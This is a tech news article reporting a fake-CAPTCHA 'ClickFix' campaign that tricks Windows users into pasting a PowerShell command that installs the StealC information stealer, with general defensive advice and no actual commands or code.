Bad actors and hackers have identified a loophole that allows them use fake CAPTCHA pages to trick Windows users into launching "Stealthy StealC Information Stealer" malware.
According to security sleuths at LevelBlue, “StealC exfiltrates browser credentials, cryptocurrency wallets, Steam accounts, Outlook credentials, system information, and screenshots to a command-and-control (C2) server using RC4-encrypted HTTP traffic.”
The social engineering campaign leverages fake CAPTCHA verification pages on compromised websites, which feature realistic Cloudflare-style security checks. As a result, unsuspecting Windows users end up manually executing malicious PowerShell commands disguised as routine verification (via TechRepublic).
I’ve never fully understood the true essence of a CAPTCHA. Yet, as we move deeper into the AI era, proving that an online user is human rather than a bot has become increasingly important. CAPTCHAs are designed to safeguard users by preventing spam and blocking password‑cracking attempts.
How bad actors use the StealC campaign
As a general rule of thumb, it's always encouraged to be mindful of the websites you're visiting to reduce security risks and threats from bad actors. However, attackers are increasingly cunning and are using more sophisticated techniques.
For instance, the StealC social engineering campaign involves unsuspecting Windows users visiting a usually legitimate website that's already been compromised by hackers, who embed malicious JavaScript code to load a fake CAPTCHA page, which resembles Cloudflare’s verification UI.
However, instead of presenting users with visual tests, the fake CAPTCHA page requests the user to press Windows Key + R, then Ctrl + V, and finally hit the Enter key as part of the verification process.
The approach, known as "ClickFix",works by exploiting Windows users’ trust in simple keyboard prompts, which they rarely question when interacting with, especially if they feel it's coming from a trusted source, making it feel like a routine security check.
By pressing the keyboard prompts as instructed in the fake CAPTCHA page, attackers preload a malicious PowerShell command onto the clipboard. When victims paste it into the Run dialog, the code executes without triggering browser download prompts or security warnings.
Consequently, the PowerShell script is connected to a remote server to fetch its code. This triggers a downloader that conventional measures used to mitigate malicious attacks by bad actors might not necessarily work on.
Strengthening defenses by restricting script use, enforcing application control in Windows, and monitoring outbound traffic to reduce credential exposure can be a few great places to start — if you're tech savvy.
Should browsers do more to protect users from fake CAPTCHA scams?Let me know in the comments.
Join us on Reddit at r/WindowsCentral to share your insights and discuss our latest news, reviews, and more.
